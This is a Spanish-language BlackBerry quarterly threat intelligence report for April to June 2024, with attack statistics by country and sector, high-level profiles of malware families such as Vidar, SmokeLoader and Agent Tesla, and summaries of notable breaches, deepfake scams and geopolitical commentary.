Inteligencia práctica que importa
Este informe ofrece una revisión exhaustiva del panorama mundial de las amenazas, centrándose en proporcionar información práctica que los clientes puedan utilizar para proteger sus organizaciones de forma proactiva. Este informe abarca el periodo comprendido entre abril y junio de 2024. Los aspectos más destacados del informe incluyen:
El malware único y los ataques detenidos (intentos de ataque bloqueados por las soluciones de ciberseguridaddeBlackBerry®) han aumentado un 53% y un 18% , respectivamente, con respecto al periodo del informe anterior. BlackBerry registró una media de más de 11.500 hashes de malware únicos capturados diariamente.
Para más información, lea Ataques trimestrales.
Este trimestre se produjeron más de 800.000 ataques contra infraestructuras críticas, de los cuales el 50% iban dirigidos contra el sector financiero.
Descubra los hallazgos internos y externos de nuestro equipo de Inteligencia sobre Ciberamenazas (CTI) en la sección Infraestructuras críticas.
Las empresas comerciales fueron objeto de fuertes ataques en este ciclo, y de estos ataques detenidos, el 66% fueron contra empresas proveedoras de bienes de equipo.
Más información sobre estas amenazas en la sección sobre Empresas Comerciales.
La nueva sección Law Enforcement Limelight aporta un nuevo aspecto a estos informes, con las conclusiones del Centro Nacional Canadiense de Coordinación de la Ciberdelincuencia (NC3).
Más información sobre la epidemia de ransomware que afecta a Canadá.
Muchos grupos delictivos de alto perfil (en concreto, grupos de ransomware) se mostraron muy activos durante el periodo del informe. Estos grupos utilizan una serie de herramientas complejas para lograr sus objetivos.
Más información en Actores de amenazas y herramientas.
El panorama de las ciberamenazas es una vorágine de grupos que explotan las vulnerabilidades más recientes y utilizan familias de malware nuevas o actualizadas.
Lea nuestra sección Amenazas frecuentes para conocer las tendencias de las amenazas en los principales sistemas operativos.
Los ladrones de información maliciosos (también conocidos como infostealers) son un arma muy utilizada por los actores de amenazas para filtrar información valiosa y credenciales.
Lea nuestras observaciones sobre herramientas de exfiltración en la sección CylanceMDR™ Observaciones.
Nuestro análisis geopolítico considera cómo el aumento de las ciberamenazas sofisticadas subraya la necesidad de mejorar la educación en materia de ciberseguridad.
Vea cómo BlackBerry está invirtiendo en cibereducación en su primer Centro de Excelencia en Ciberseguridad (CCoE) en Malasia.
Índice
Ciberataques totales en este periodo
De abril a junio de 2024, las soluciones de ciberseguridad deBlackBerry detuvieron 3,7 millones de ciberataques. Esto supone más de 43.500 ciberataques detenidos al día, lo que supone un aumento del 18 % con respecto a nuestro anterior periodo de información, de enero a marzo de 2024.
Además, observamos una media de 11.500 muestras únicas de malware al día dirigidas a nuestra base de clientes, un 53% más que en el último informe. Se trata de uno de los mayores incrementos porcentuales, trimestre tras trimestre, desde que empezamos a elaborar nuestros informes de Inteligencia Global sobre Amenazas. Aunque alterar el hash de un binario o generar cargas útiles únicas no es complejo para los actores de amenazas experimentados, el volumen inusualmente alto de "Ataques detenidos" y "Hashes únicos" es significativo. Indica que los desarrolladores de malware están actualizando y adaptando rápidamente su código para aumentar su resistencia. Las cifras en bruto sugieren que el nuevo malware se está adaptando, que las familias de malware existentes están ganando capacidades y que los adversarios están empleando rápidamente tácticas más avanzadas. El resultado es un malware más potente gracias a la ofuscación, sofisticación y técnicas de evasión mejoradas.
BlackBerry está vigilando activamente e identificando modificaciones en las familias de malware a medida que los desarrolladores de ciberdelincuentes se esfuerzan por eludir los sistemas de ciberseguridad. En este informe, podrá leer los últimos hallazgos de nuestro Equipo de Investigación e Inteligencia de Amenazas, conocer qué grupos están utilizando actualmente cada tipo de malware y revisar nuestras recomendaciones sobre ciberdefensa estratégica frente a este tipo de amenazas.
Como podrá observar, el número de ataques totales no está necesariamente correlacionado con el número de hashes únicos (nuevo malware). Como ilustran las figuras 2 a 9 de las secciones siguientes, no todos los ciberataques utilizan programas maliciosos únicos. Depende de la motivación del atacante, de la complejidad del ataque y de su objetivo general, por ejemplo, espionaje, beneficios económicos o causar un daño general al objetivo.
(*Este informe cubre un ciclo de 120 días. Los demás informes son ciclos de aproximadamente 90 días).
Ciberataques totales por país
Ataques detenidos
Las organizaciones que utilizan soluciones BlackBerry en Estados Unidos recibieron el mayor número de intentos de ataque este ciclo. Fuera de Estados Unidos, Corea del Sur, Japón, Australia y Nueva Zelanda también sufrieron un alto nivel de ataques, lo que les valió estar entre las cinco regiones más atacadas y convertir a Asia-Pacífico (APAC) en la segunda región más atacada.
En la región APAC, donde la participación de BlackBerry es cada vez mayor, las tensiones geopolíticas siguen influyendo en las tendencias cibernéticas. Aumentan los ciberataques, tanto estatales como no estatales, contra infraestructuras críticas, cadenas de suministro y empresas. Las organizaciones están cada vez más en el punto de mira de una plétora de amenazas como el ciberespionaje, las escuchas, el ransomware y los ataques de phishing. Para mejorar la resistencia de sus cadenas de suministro y organizaciones, deben actuar con cautela y aumentar su vigilancia para proteger sus infraestructuras, datos, dispositivos y comunicaciones.
La figura 2 muestra las cinco naciones en las que las soluciones de ciberseguridad de BlackBerry detuvieron más ciberataques y que recibieron la mayoría de los binarios maliciosos.
Malware único
Como se indica en la sección Ciberataques totales en este periodo, BlackBerry observó una media de 11.500 nuevos hashes (malware único) al día dirigidos a nuestra base de clientes, un 53% más que en el informe anterior. Se trata de uno de los mayores aumentos porcentuales intertrimestrales que hemos observado desde que empezamos a elaborar nuestros informes periódicos. Muchos factores contribuyen a este aumento del malware único. Uno de ellos es el aumento de los ataques selectivos a nivel macro, como los dirigidos a toda una lista de correos electrónicos de empleados con mensajes de phishing selectivos y señuelos específicos de la empresa, con la esperanza de engañar a varios empleados.
Como muestra la figura 2, Estados Unidos, Japón, Corea del Sur y Australia siguen encabezando la lista, al igual que en el informe del periodo anterior. Como muestra la figura 2, Estados Unidos, Japón, Corea del Sur y Australia siguen encabezando la lista, al igual que en el informe del periodo anterior. Además, Canadá es ahora el quinto mayor receptor de malware único.
Comparación de resultados
Ciberhistoria destacada: Espionaje en APAC
Transparent Tribe se dirige a los sectores gubernamental, aeroespacial y de defensa de la India aprovechando los lenguajes de programación multiplataforma
En sus últimos esfuerzos, los investigadores de BlackBerry identificaron a Transparent Tribe, un grupo pakistaní de amenazas persistentes avanzadas (APT), dirigido a los sectores gubernamental, de defensa y aeroespacial de la India. Conocido por llevar a cabo ciberespionaje desde 2013, el grupo utiliza lenguajes multiplataforma como Python y Golang, y abusa de servicios web como Telegram y Discord. Entre sus últimas campañas se incluyen correos electrónicos de spearphishing dirigidos a actores clave del sector aeroespacial en Bengaluru (antes Bangalore), India. A pesar de los intentos de ocultar sus orígenes, las tácticas y herramientas de Transparent Tribe apuntan a ellos.
Ciberataques por sector
BlackBerry ha consolidado sus sectores industriales en dos grandes categorías: infraestructuras críticas y empresas comerciales. BlackBerryLa telemetría y las estadísticas de infraestructuras críticas de la empresa proceden de sus clientes en los 16 sectores definidos por la Agencia de Ciberseguridad y Seguridad de las Infraestructuras (CISA ) como infraestructuras críticas. Estos sectores incluyen la sanidad, la administración pública, la energía, la agricultura, las finanzas y la defensa. Las entidades comerciales de las empresas comerciales se dedican a la producción, distribución o venta de bienes y servicios. Estas empresas operan en diversos sectores como la fabricación, el comercio minorista y los servicios.
Infraestructuras críticas
Las infraestructuras críticas son un objetivo lucrativo para los ciberdelincuentes. Estos datos suelen ser muy valiosos y pueden revenderse a otros grupos de amenazas, utilizarse para planificar ataques o incluso para espionaje. Los actores de amenazas que atacan infraestructuras críticas pueden recurrir al uso de ransomware en sus ataques porque la organización puede preferir pagar el rescate en lugar de perder tiempo intentando restaurar a partir de copias de seguridad. El tiempo es esencial para las organizaciones que prestan servicios críticos, como la sanidad, y los actores de amenazas lo saben muy bien.
Este año, las turbulencias geopolíticas han colocado a las infraestructuras críticas en el punto de mira de adversarios opuestos a las políticas de las naciones en las que residen o con las que colaboran. Con frecuencia, esto impulsa a los grupos de amenazas y a los estados patrocinadores a atacar específicamente las infraestructuras críticas.
La creciente digitalización de las infraestructuras críticas ha hecho que el sector sea aún más vulnerable a los ciberdelincuentes en los últimos años. Los actores de las amenazas explotan activamente los sistemas críticos atacando vulnerabilidades como las desconfiguraciones de los sistemas y los sistemas heredados sin parchear o intentando infiltrarse en los sistemas a través de campañas de ingeniería social dirigidas contra los empleados.
En el periodo de tiempo comprendido entre abril y junio de 2024, CylanceENDPOINT™ y otras soluciones de ciberseguridad de BlackBerry detuvieron más de 800.000 ataques contra organizaciones de los sectores industriales de infraestructuras críticas. Casi la mitad de estos ataques fueron contra empresas del sector financiero - un aumento del 10% respecto al período anterior - mientras que las organizaciones gubernamentales y del sector público experimentaron la mayor diversidad de ataques, atrayendo a más del 45% de los hash únicos.
Además, casi la mitad (49%) de los hashes de malware únicos iban dirigidos a organizaciones de infraestructuras críticas, un 17% más que en el periodo anterior, mientras que el 41% de los ciberataques específicos del sector detectados por las soluciones de ciberseguridad de BlackBerry iban dirigidos contra infraestructuras críticas.
-
Infraestructuras críticas: Amenazas internas
Las amenazas internas son las que BlackBerry identifica y contra las que se protege dentro de su propia base de clientes. Las amenazas externas (tratadas en la siguiente sección) son aquellas de las que informan terceras partes, como las publicaciones de noticias del sector, los proveedores de seguridad o los organismos gubernamentales.
-
Vidar
Tipo: Infostealer
Objetivos: Telecomunicaciones, sanidad
Regiones: América Latina (LATAM), América del Norte
Vidar es un infostealer que existe desde 2018. Vidar, probablemente el vástago del otrora famoso infostealer Arkei, se ha mantenido extremadamente activo y a menudo se vende a través de malware como servicio (MaaS) en foros clandestinos. El malware es muy flexible y puede introducirse en el dispositivo de la víctima de diversas formas, como a través de documentos de phishing, malvertising (publicidad que propaga malware) y mediante distribución secundaria a través de otro malware. A principios de 2024, observamos que Vidar también se utilizaba para atacar infraestructuras críticas. Durante este periodo, observamos que Vidar atacaba principalmente los sectores de las telecomunicaciones y la sanidad, especialmente en los países de Latinoamérica, y también se observó que atacaba la sanidad en Norteamérica.
-
Cargador de humo
Tipo: Descargador
Objetivos: Alimentación y agricultura, sanidad
Regiones: LATAM, Norteamérica
SmokeLoader, en funcionamiento desde 2011, es un importante mecanismo de entrega de cargas útiles maliciosas de segunda fase, entre las que se incluyen diversos troyanos, infostealers e incluso ransomware. SmokeLoader, que se vende como MaaS, también puede recopilar credenciales de usuario. Es popular entre una serie de grupos de amenazas de alto perfil debido a su capacidad para desplegar malware adicional. En mayo de 2024, Europol coordinó la operación Endgame contra los descargadores maliciosos. Más de 100 servidores de malware fueron desmantelados o inutilizados y más de 2.000 dominios fueron incautados por las fuerzas de seguridad. Aunque estas acciones paralizaron gravemente las operaciones de los grupos de amenazas que estaban detrás de SmokeLoader, este trimestre se siguieron observando binarios relacionados con el malware en el sector sanitario norteamericano y en la industria agroalimentaria de LATAM.
-
RisePro
Tipo: Infostealer
Objetivos: Telecomunicaciones, agricultura y alimentación, sanidad
Regiones: LATAM, Norteamérica
RisePro es un infostealer multifuncional que a menudo se vende como MaaS en foros clandestinos. RisePro se observó inicialmente a finales de 2022. Después, a finales de 2023 y principios de 2024, BlackBerry observó un fuerte aumento de la actividad de RisePro.
El infostealer RisePro puede introducirse en el dispositivo de la víctima de diversas formas, a menudo a través de enlaces maliciosos o adjuntos de correo electrónico. También se ha desplegado a través de PrivateLoader, un malware de pago por instalación (PPI) utilizado a menudo como servicio de distribución de malware.
Una vez en el dispositivo de la víctima, RisePro se comunica con su servidor de mando y control (C2), donde recibe órdenes para robar datos, soltar malware adicional y extraer información del dispositivo. Este trimestre, se observó que RisePro se dirigía a empresas de alimentación, agricultura y telecomunicaciones en países de Latinoamérica y a servicios sanitarios en Norteamérica.
-
GuLoader
Tipo: Descargador
Objetivos: Educación, transporte, sanidad, alimentación y agricultura
Regiones: APAC, Norteamérica
GuLoader (también conocido como CloudEyE) es un destacado descargador que distribuye otros programas maliciosos. Desde 2020, el grupo de amenazas que está detrás de GuLoader ha añadido técnicas antianálisis para dificultar que los servicios de seguridad identifiquen sus ataques o ideen contramedidas. GuLoader suele funcionar en tándem con otros programas maliciosos, en concreto infostealers como FormBook, Agent Tesla y Remcos.
Durante este ciclo de informes, GuLoader parecía dirigirse principalmente a organizaciones norteamericanas de los sectores del transporte, la alimentación y la agricultura, y la educación. Sin embargo, también se encontraron binarios de GuLoader en empresas de transporte de países de APAC.
-
Robo de Lumma
Tipo: Infostealer
Objetivos: Alimentación y agricultura, energía, finanzas
Regiones: APAC, LATAM, Norteamérica
Lumma Stealer (también conocido como LummaC2) es un infostealer basado en C que, por segundo periodo consecutivo, ha atacado a empresas de alimentación y agricultura en LATAM y al sector energético en APAC. Lumma Stealer es un MaaS especializado en filtrar datos confidenciales como credenciales de acceso y datos bancarios para cometer fraudes bancarios. Además, Lumma Stealer se dirigió a empresas de servicios financieros tanto en Norteamérica como en APAC.
Ciberhistoria destacada: Amenazas contra las infraestructuras críticas
SideWinder utiliza una nueva infraestructura de distribución para llegar a los puertos e instalaciones marítimas del Mediterráneo
En julio de 2024, el Equipo de Investigación e Inteligencia de Amenazas de BlackBerry descubrió una nueva campaña del grupo de amenazas conocido como SideWinder. También conocido como Razor Tiger, Rattlesnake y T-APT-04, el grupo SideWinder lleva activo al menos desde 2012. Anteriormente se había observado que el grupo tenía como objetivo entidades militares, gubernamentales y empresariales, con especial atención a Pakistán, Afganistán, China y Nepal. SideWinder suele utilizar técnicas de spearphishing por correo electrónico, explotación de documentos y carga lateral de DLL para evitar ser detectado y enviar implantes selectivos.
En esta campaña, BlackBerry observó tres documentos falsificados de "señuelos visuales" asociados a infraestructuras portuarias muy específicas. Los señuelos visuales no suelen ser maliciosos en sí mismos; su objetivo principal es distraer a la víctima para que no se dé cuenta de que está siendo comprometida. La víctima suele ser un empleado de una empresa objetivo. A continuación se muestra un ejemplo de la última campaña de SideWinder:
Los actores de la amenaza utilizan una variedad de trucos para tentar a la víctima a abrir y leer el documento cebo visual:
- El atacante copia el logotipo real de una organización legítima con la que el destinatario probablemente esté familiarizado debido a su trabajo o sector. En la figura 7, el documento cebo visual abusa del logotipo de la Autoridad Portuaria del Mar Rojo (legítima) en Egipto.
- Los títulos de los documentos están diseñados para causar la máxima ansiedad en el destinatario. El encabezamiento de nuestro ejemplo anterior ("AVISO DE CESE DE EMPLEADO Y RECORTE SALARIAL") pretende hacer temer al empleado por la seguridad de su puesto de trabajo y sus finanzas.
- En el ejemplo anterior, fíjese en las frases cargadas de emoción como "ha agotado la mayor parte de nuestras reservas financieras", "grave preocupación" y "despido" en el cuerpo del documento. Estas frases están en negrita para que destaquen inmediatamente ante el lector.
Los autores de las amenazas esperan que, utilizando logotipos de empresas conocidas y provocando emociones fuertes como el miedo o la preocupación por la seguridad laboral, la víctima crea que el documento es legítimo y se vea obligada a leerlo en un estado de gran ansiedad. Entonces estarán tan distraídos que no notarán sucesos extraños en su dispositivo, como ventanas emergentes del sistema o el aumento del ruido del ventilador causado por una alta utilización de la CPU, que suele ser una señal de advertencia temprana de una infección de malware en curso.
Al analizar los datos descubiertos durante nuestra investigación, concluimos con una confianza media que la nueva campaña de SideWinder tiene como objetivo puertos e instalaciones marítimas en el Océano Índico y el Mar Mediterráneo. Basándonos en las campañas anteriores de SideWinder, creemos que el objetivo de esta nueva campaña es el espionaje y la recopilación de inteligencia. Lea la noticia completa en el blogBlackBerry .
Infraestructuras críticas: Amenazas externas
BlackBerry también realiza un estrecho seguimiento de las amenazas externas, o amenazas de las que informan organizaciones externas y que no se encuentran necesariamente en los propios inquilinos de BlackBerry. A lo largo de este periodo, grupos externos -agencias gubernamentales, organizaciones de noticias del sector y otras- informaron de numerosos ataques en todo el mundo contra infraestructuras críticas.
En los últimos días de marzo, saltó la noticia de que varias agencias gubernamentales y entidades del sector energético de la India habían sido infectadas con una variante personalizada del infostealer de libre distribución HackBrowserData. Utilizando correos electrónicos de phishing como vector de infección y canales de Slack como vía de filtración, el desconocido actor de la amenaza robó 8,8 GB de datos confidenciales, incluidos datos de empleados y registros financieros.
En abril, Frontier Communications, una empresa de telecomunicaciones con sede en Texas, informó a la Comisión del Mercado de Valores de Estados Unidos (SEC) de que había detectado una brecha el 14 de abril y tuvo que cerrar algunos de sus sistemas para recuperarse. El autor de la amenaza, desconocido, pudo acceder a datos sensibles, incluida información de identificación personal.
También en abril, el Equipo de Respuesta a Emergencias Informáticas de Ucrania (CERT-UA) informó de un plan del grupo Sandworm, supuestamente patrocinado por Rusia, para atacar varias entidades de infraestructuras críticas del país devastado por la guerra. El plan iba dirigido a unas 20 entidades de diversos sectores de infraestructuras críticas, como el agua y la energía. Es probable que el largo historial de ataques de Sandworm contra las infraestructuras críticas de Ucrania persista mientras continúe la guerra entre Rusia y Ucrania.
La primera semana de mayo se recibió un aviso conjunto de varias agencias estadounidenses, en colaboración con el Centro Nacional de Ciberseguridad del Reino Unido y el Centro de Ciberseguridad de Canadá (CCCS), sobre la amenaza de los hacktivistas prorrusos. El objetivo de los hacktivistas eran las infraestructuras críticas conectadas a Internet, como el agua, la energía, las presas y la agricultura. Sus actividades se centraron en los sistemas de tecnología operativa (OT) conectados a Internet en sectores de infraestructuras críticas de Europa y Norteamérica.
A principios de mayo, los operadores del ransomware BlackBasta atacaron a un gran proveedor católico de servicios sanitarios sin ánimo de lucro con unos 140 hospitales en 18 estados de EE.UU. El ataque interrumpió los servicios en toda la red del proveedor sanitario durante varias semanas. A principios de junio, BlackBasta robó 550 GB de datos de la empresa de biotecnología Elutia, con sede en Maryland. Los datos incluían información financiera y sobre los empleados.
BlackBasta no era la única banda de ransomware dirigida a la sanidad. A finales de junio, el grupo BlackSuit atacó el Servicio Nacional de Laboratorios Sanitarios (NHLS) de Sudáfrica y sus 265 laboratorios. Se cree que BlackSuit es un derivado de la agresiva y peligrosa banda de ransomware Conti. La brecha de BlackSuit coincidió con un brote de viruela del mono (mpox) y afectó significativamente a los sistemas del NHLS. El autor de la amenaza borró partes de los sistemas del NHLS, incluidas las copias de seguridad, aunque no se informó de la pérdida de datos sensibles de los pacientes.
Estos ataques y otros ocurridos a lo largo del último trimestre indican que los operadores de ransomware dirigidos contra infraestructuras críticas, en particular el sector sanitario, siguen siendo un problema persistente.
Empresa comercial
Las amenazas internas contra las empresas comerciales también aumentaron significativamente durante este periodo. El número de ataques detenidos por la ciberseguridad de BlackBerry (1,1 millones de ataques) aumentó un 60% en comparación con el último informe.
Dentro del sector de las empresas comerciales, observamos un aumento significativo de los ataques contra el sector de los bienes de equipo. A diferencia de los bienes de consumo, los bienes de capital incluyen maquinaria, herramientas y equipos esenciales para diversas industrias en toda la empresa comercial y la infraestructura crítica. Atacar estos activos puede afectar a las cadenas de suministro digitales y físicas de una empresa.
-
Empresa comercial: amenazas internas
Las amenazas internas son las que BlackBerry identifica y contra las que se protege dentro de su propia base de clientes. Las amenazas externas (tratadas en la siguiente sección) son aquellas de las que informan terceras partes, como las publicaciones de noticias del sector, los proveedores de seguridad o los organismos gubernamentales.
-
Amadey
Tipo: Bot/Infosteador
Objetivos: Industria manufacturera, servicios comerciales, bienes de equipo
Regiones: Europa, Oriente Medio y África (EMEA), APAC, LATAM
Amadey, que apareció por primera vez en 2018, es un malware modular que sigue activo en el panorama de las amenazas. A través de cambios iterativos, se ha mantenido relevante con los recientes avances en sus comunicaciones. Amadey puede recopilar inteligencia y sondear las máquinas víctimas antes de filtrar datos a su C2. A menudo se utiliza como red de bots para propagar otro malware en masa y con frecuencia facilita el despliegue de infostealers y criptomineros maliciosos.
Durante este periodo, Amadey se centró en los servicios de fabricación y comerciales en las regiones de EMEA, APAC y LATAM, así como en los servicios de bienes de equipo específicamente en los países de LATAM.
-
PrivateLoader
Tipo: Descargador
Objetivos: Industria, servicios comerciales
Regiones: APAC, LATAM, Norteamérica
PrivateLoader es un facilitador de malware muy extendido que funciona como un servicio de pago por instalación para la distribución de malware. Distribuido a menudo a través de sitios web falsos que alojan software "crackeado", PrivateLoader puede descargar una variedad de cargas útiles maliciosas, incluyendo una amplia gama de infostealers como RisePro. PrivateLoader utiliza una técnica conocida como envenenamiento SEO para aumentar la prominencia de sus sitios web falsos. Esta técnica engaña a los usuarios haciéndoles creer que los primeros resultados de búsqueda son los más creíbles y resulta muy eficaz cuando la gente no se fija bien en los resultados de búsqueda. Durante este periodo, PrivateLoader se centró en el sector manufacturero de Norteamérica y en los servicios comerciales de Latinoamérica y Asia-Pacífico.
-
Agente Tesla
Tipo: Troyano de acceso remoto
Objetivos: Industria manufacturera, comercio minorista de alimentación, servicios comerciales
Regiones: APAC, LATAM, Norteamérica
Agent Tesla es un importante troyano de acceso remoto (RAT) especializado en el robo de información que lleva atacando activamente a usuarios con sistemas basados en el sistema operativo Microsoft Windows desde 2014. Este malware comercial, que se vende a través de foros clandestinos y se promociona como una oferta MaaS, es conocido por robar datos y credenciales confidenciales, grabar pulsaciones de teclas y realizar capturas de pantalla de las víctimas. A menudo se utiliza en campañas de phishing y se aloja o distribuye como software crackeado troyanizado.
En este ciclo, el Agente Tesla se ha centrado en varios sectores, como la industria manufacturera, la venta minorista de alimentos y los servicios comerciales en países de APAC, LATAM y Norteamérica.
-
Libro de formularios
Tipo: Infostealer
Objetivos: Comercio minorista de alimentación
Regiones: APAC
FormBook y su evolución, XLoader, son sofisticadas familias de malware que operan tanto como complejos ladrones de información como versátiles descargadores de malware adicional. Desde su creación, estas familias de malware han sido resistentes y han evolucionado constantemente para evadir y eludir las ciberdefensas mediante técnicas anti-VM, inyección de procesos y rutinas de cifrado personalizadas.
XLoader, que a menudo se vende como MaaS, puede robar datos de navegadores, clientes de correo electrónico y otras aplicaciones. Este trimestre, varios ciberincidentes relacionados con XLoader afectaron a minoristas de alimentación en países de APAC.
-
GuLoader
Tipo: Descargador
Objetivos: Servicios comerciales, venta al por menor de alimentos, industria manufacturera
Regiones: APAC, EMEA, Norteamérica
GuLoader, también conocido como CloudEyE, es un destacado downloader utilizado en numerosos ataques como mecanismo de entrega de otro malware. Activo en desde 2020, ha sufrido cambios iterativos, volviéndose más sofisticado e integrando técnicas antianálisis adicionales. GuLoader trabaja habitualmente con otro malware, concretamente con infostealers como FormBook, Agent Tesla y Remcos.
Este trimestre, GuLoader se ha dirigido a la industria manufacturera en Norteamérica, a los minoristas de alimentación en APAC y a los servicios comerciales tanto en EMEA como en APAC.
-
RisePro
Tipo: Infostealer
Objetivos: Servicios comerciales, bienes de equipo
Regiones: APAC
RisePro es un infostealer multifuncional que a menudo se vende como MaaS en foros clandestinos. RisePro se observó inicialmente a finales de 2022. Después, a finales de 2023 y principios de 2024, BlackBerry observó un fuerte aumento de la actividad de RisePro. RisePro puede introducirse en el dispositivo de la víctima de diversas formas, a menudo a través de enlaces maliciosos o adjuntos de correo electrónico. También se ha desplegado a través de PrivateLoader, un malware PPI utilizado frecuentemente como servicio de distribución de malware. Una vez en el dispositivo, RisePro se comunica con su servidor C2, donde recibe órdenes para robar datos, instalar más malware o extraer información del dispositivo de la víctima.
-
Vidar
Tipo: Infostealer
Objetivos: Industria manufacturera, comercio minorista de alimentación, servicios comerciales, bienes de equipo
Regiones: APAC, EMEA, LATAM
Vidar es un infostealer que existe desde 2018 y puede ser el vástago del infostealer conocido como Arkei. Vidar ha sido extremadamente activo y a menudo se vende como MaaS a través de foros clandestinos. El malware es altamente flexible y puede caer en un dispositivo víctima de varias maneras, como a través de documentos de phishing, malvertising (publicidad que propaga malware) y por distribución secundaria a través de otro malware. Durante este periodo, Vidar se dirigió a una serie de sectores empresariales comerciales, como la industria manufacturera en EMEA, el comercio minorista de alimentación en APAC, los bienes de equipo en LATAM y los servicios comerciales tanto en LATAM como en APAC.
Empresa comercial: Amenazas externas
A principios de abril, IxMetro PowerHost sufrió un ciberataque por parte de la relativamente nueva banda de ransomware SEXi, que supuestamente utilizó código fuente filtrado de LockBit 3.0. El grupo atacó los servidores VMware ESXi y las copias de seguridad de la organización, causando una importante interrupción de los servicios en Chile. El grupo atacó los servidores VMware ESXi y las copias de seguridad de la organización, causando una interrupción significativa de los servicios de IxMetro PowerHost en Chile.
También en abril, la plataforma de compras china Pandabuy sufrió una brecha y se filtraron en línea los datos de más de 1,3 millones de clientes. Pandabuy permite a los usuarios comprar productos de otras plataformas chinas de comercio electrónico. Un agente de amenazas conocido como Sanggiero reivindicó la autoría del ataque, afirmando que explotó vulnerabilidades críticas del servidor en la API de la plataforma y otros exploits para acceder a los servicios internos del minorista. Se sospecha que el minorista de comercio electrónico pagó inicialmente una demanda para evitar la fuga de datos. Sin embargo, en junio de 2024, el mismo actor de amenazas afirmó haber explotado y extorsionado de nuevo la plataforma con sede en China.
A principios de mayo, una importante multinacional tecnológica alertó a sus clientes de una filtración de datos a gran escala que afectaba a casi 50 millones de personas. Aunque la empresa tecnológica confirmó que no se había puesto en peligro ninguna información financiera, sí se habían expuesto otros datos de identificación personal (IPI), como nombres y direcciones físicas de clientes. A pesar de ello, la empresa tecnológica ha restado importancia públicamente al impacto potencial de la filtración debido a la naturaleza no financiera de los datos robados.
Una de las mayores filtraciones de datos de lo que va de año se produjo en mayo, cuando el grupo de amenazas ShinyHunters accedió a una multinacional de venta y distribución de entradas de espectáculos y robó los datos de más de 560 millones de clientes. Los datos incluían información personal como nombres, direcciones y correos electrónicos, así como datos cifrados de tarjetas de crédito. Los usuarios afectados han sido notificados por correo.
En junio, una multinacional estadounidense de software sufrió una gran interrupción debido a un ataque de ransomware , que afectó a las operaciones de miles de concesionarios de automóviles norteamericanos. La interrupción afectó a todas las facetas de las actividades de los concesionarios, incluidas las ventas y reparaciones de automóviles, en más de 15.000 locales. El grupo de ransomware BlackSuit reivindicó la autoría del ataque, exigiendo casi 25 millones de dólares en criptomoneda como rescate. Se alega que la organización pagó el rescate para restaurar sus sistemas.
A finales de junio, TeamViewer, la empresa norteamericana de servicios de software, confirmó que el prolífico grupo APT Cozy Bear (también conocido como APT29) había atacado sus sistemas informáticos corporativos. Cozy Bear es un grupo de piratas informáticos con sede en Rusia supuestamente afiliado al Servicio de Inteligencia Exterior de Rusia. A lo largo de los años, el grupo ha perpetrado múltiples ataques y exploits, incluida la brecha de SolarWinds de 2020. TeamViewer emitió un comunicado en el que afirmaba que solo se habían visto comprometidos los datos de las cuentas de los empleados y que no había pruebas de que Cozy Bear hubiera accedido a los entornos de producción o a los datos de los clientes.
Ciberhistoria destacada: Deepfakes contra empresas comerciales
Vigilancia de los empleados: La primera línea de defensa contra las estafas de Deepfake
Las fotos, vídeos y audios "deepfake" se están convirtiendo en un problema cada vez mayor de ciberseguridad. Los "deepfakes" son medios manipulados digitalmente y creados mediante inteligencia artificial generativa (IA), siendo el caso de uso más común el "facewap", es decir, la superposición digital de la cara de una persona sobre otra. Los medios deepfake son a menudo muy realistas y convincentes y pueden ser utilizados por los delincuentes en una amplia gama de ataques, como estafas de phishing, llamadas telefónicas falsas e incluso videollamadas falsas para hacer creer al destinatario que está recibiendo una solicitud legítima de otro empleado, como su jefe.
Desde que un usuario de Reddit lanzara la primera app para crear deepfakes a finales de 2017, estas han evolucionado a la velocidad del rayo hasta convertirse en aterradoramente eficaces para engañar a los empleados y hacer que proporcionen a los atacantes credenciales de inicio de sesión, registros financieros o de clientes, e incluso transferir millones de dólares de fondos de la empresa a un estafador.
En un incidente reciente, el fabricante de automóviles Ferrari escapó a una costosa estafa de deepfake. Un ejecutivo recibió una llamada sospechosa de alguien que se hacía pasar por el consejero delegado, Benedetto Vigna. El acento y el tono del estafador eran casi idénticos a los del CEO real, pero el ejecutivo advirtió señales de alarma, como el uso de un número de teléfono desconocido y la supuesta urgencia de los mensajes.
Para verificar la identidad de la persona que llamaba, el ejecutivo hizo una pregunta concreta sobre la recomendación de un libro, un detalle que sólo conocería el verdadero director general. Cuando el estafador no pudo responder, colgaron. La rapidez mental del ejecutivo evitó un desastre potencial y llevó a Ferrari a iniciar una investigación interna para garantizar la seguridad de sus comunicaciones.
Este incidente pone de relieve el importante papel que desempeñan los empleados en la protección de sus empresas frente al fraude. Un componente fundamental de casi todos los ataques deepfake es la ingeniería social; el agente de la amenaza asume que el empleado es el eslabón más débil del perímetro de seguridad de la empresa y utiliza técnicas de manipulación psicológica para ganarse la confianza de su objetivo. Enhorabuena a los empleados que se mantienen vigilantes y escépticos ante solicitudes inusuales, especialmente las que implican la transferencia de dinero o información sensible. Su concienciación y rápida actuación pueden salvar a una empresa de importantes pérdidas económicas y daños a su reputación.
Las empresas pueden mejorar su seguridad educando a sus empleados sobre las señales de alarma que indican que un estafador puede estar detrás de una llamada telefónica/vídeo, correo electrónico o mensaje de texto "falsos". Puede empezar por celebrar y apoyar a estos héroes anónimos que protegen cada día a su organización de amenazas sofisticadas. Comparta esta anécdota con colegas y compañeros de trabajo. Recuérdeles que, si sospechan que algo no va bien, confíen en su instinto y busquen una forma secundaria de verificar la identidad del solicitante.
Para saber más sobre los deepfakes, lea nuestro libro blanco, Deepfakes desenmascarados: La tecnología y las técnicas detrás de esta creciente amenaza..
Análisis y comentarios geopolíticos
Los gobiernos de todo el mundo tienen cada vez más claro que la tecnología es una fuerza impulsora de la rivalidad geopolítica. En su discurso en la Conferencia RSA de San Francisco, California, el 6 de mayo de 2024, el Secretario de Estado de Estados Unidos, Antony J. Blinken, describió un mundo a las puertas de una competición de suma cero en la que los países se verían obligados a adoptar pilas tecnológicas occidentales o chinas. El embajador del Secretario Blinken para el ciberespacio y la política digital, Nathaniel C. Fick, fue aún más mordaz al afirmar que "el orden internacional se definirá por el sistema operativo metafórico de quién domine".
El ritmo sin precedentes al que avanzan tecnologías como la IA generativa ha dado lugar a un aluvión de actividades que reclaman un uso "responsable" de las tecnologías digitales avanzadas. Si bien las tecnologías como la IA tienen un potencial significativo para impulsar el crecimiento económico, transformar las sociedades y abordar algunos de los problemas más intratables del mundo (por ejemplo, el cambio climático, la desigualdad y las enfermedades), también plantean riesgos que pueden ser de alto impacto, sobre todo si esos riesgos se manifiestan en infraestructuras o servicios críticos de los que las personas dependen cada día.
